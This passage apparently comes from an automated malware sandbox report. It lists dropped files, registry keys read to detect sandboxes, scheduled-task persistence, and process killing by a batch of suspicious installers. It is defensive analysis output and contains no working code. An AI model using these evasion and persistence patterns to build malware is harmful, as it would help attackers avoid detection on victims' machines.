prolab.tmpjg7_7wjg.exesetup_10.2_mix.exeguihuali-game.exeirecord.tmpIBInstaller_97039.tmpvpn.tmpMicrosoft.exevict.tmpSetup.exe29DEA0BA258723098A514297F4C4D0B7.exeei111qo1fyj.tmpvict.tmpsetup_10.2_mix.exeSetup.exeppppppfy.exedescription ioc process File created C:\Program Files (x86)\Picture Lab\is-22E4G.tmp prolab.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.jfm jg7_7wjg.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_hover.png setup_10.2_mix.exe File created C:\Program Files\unins.vbs guihuali-game.exe File created C:\Program Files\unins0000.dat guihuali-game.exe File opened for modification C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll irecord.tmp File opened for modification C:\Program Files (x86)\Install engine 16\networkinspection.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-QV88O.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\Reference Assemblies\Naebafewyvi.exe.config Microsoft.exe File created C:\Program Files (x86)\viewerise\is-GMMFM.tmp vict.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\DreamTrip.exe setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\Gadget.Xml setup_10.2_mix.exe File created C:\Program Files (x86)\I-record\is-0P1HV.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-JM5E9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.Math.dll prolab.tmp File created C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d jg7_7wjg.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-N5SFO.tmp prolab.tmp File created C:\Program Files (x86)\I-record\is-L1H1P.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-JKEVV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-01L43.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\SourceLibrary.dll prolab.tmp File created C:\Program Files (x86)\I-record\is-3OHBA.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-JGU5K.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-D318Q.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-VV7Q4.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File created C:\Program Files (x86)\Install engine 16\is-NQTJB.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Uninstall.exe 29DEA0BA258723098A514297F4C4D0B7.exe File opened for modification C:\Program Files (x86)\I-record\avdevice-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.INTEG.RAW jg7_7wjg.exe File created C:\Program Files (x86)\viewerise\is-P5QOE.tmp ei111qo1fyj.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat ei111qo1fyj.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe 29DEA0BA258723098A514297F4C4D0B7.exe File created C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\viewerise\is-AJ9E6.tmp vict.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File opened for modification C:\Program Files (x86)\Install engine 16\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe 29DEA0BA258723098A514297F4C4D0B7.exe File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_hover.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files (x86)\Install engine 16\Swap.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JGDDL.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-FLUPE.tmp vpn.tmp File created C:\Program Files (x86)\Google\Gaewemovaje.exe.config ppppppfy.exe File opened for modification C:\Program Files (x86)\I-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-BE4EO.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Install engine 16\PPMd.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\Picture Lab\is-2EURL.tmp prolab.tmp File created C:\Program Files (x86)\Reference Assemblies\Naebafewyvi.exe Microsoft.exe File opened for modification C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe ei111qo1fyj.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe 29DEA0BA258723098A514297F4C4D0B7.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png setup_10.2_mix.exe File created C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Uninstall.ini 29DEA0BA258723098A514297F4C4D0B7.exe File opened for modification C:\Program Files (x86)\I-record\unins000.dat irecord.tmp File created C:\Program Files (x86)\I-record\is-KNP0J.tmp irecord.tmp File created C:\Program Files (x86)\Install engine 16\is-TIMLC.tmp IBInstaller_97039.tmp -
Drops file in Windows directory 38 IoCs
Processes:
DrvInst.exemsiexec.exemultitimer.exeMicrosoftEdge.exeexpand.exemultitimer.exeFull Program Features.exeWerFault.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exesvchost.exeDrvInst.exeexplorer.exedescription ioc process File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI3588.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI3819.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\f752ed1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3A5D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5417.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\INF\setupapi.dev.log Full Program Features.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI3924.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4DAA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI503D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4E96.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Installer\f752ed1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4DDA.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI3D9B.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI3C14.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new explorer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new explorer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exetapinstall.exetoolspab1.exeDrvInst.exesvchost.exeFull Program Features.exetoolspab1.exeDrvInst.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs Full Program Features.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID Full Program Features.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags Full Program Features.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
client32.exesvchost.exeloli.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString client32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 loli.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString loli.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 client32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz client32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5800 timeout.exe 4432 timeout.exe 10156 timeout.exe 3756 timeout.exe 7484 timeout.exe 8524 timeout.exe 7808 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
multitimer.execlient32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS client32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU client32.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5976 taskkill.exe 7676 taskkill.exe 5064 taskkill.exe 1772 taskkill.exe 192 taskkill.exe 7160 taskkill.exe 4268 taskkill.exe 9020 taskkill.exe 5672 taskkill.exe 4700 taskkill.exe -
Processes:
vict.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main vict.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exesvchost.exeDrvInst.exefile.exefile.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = 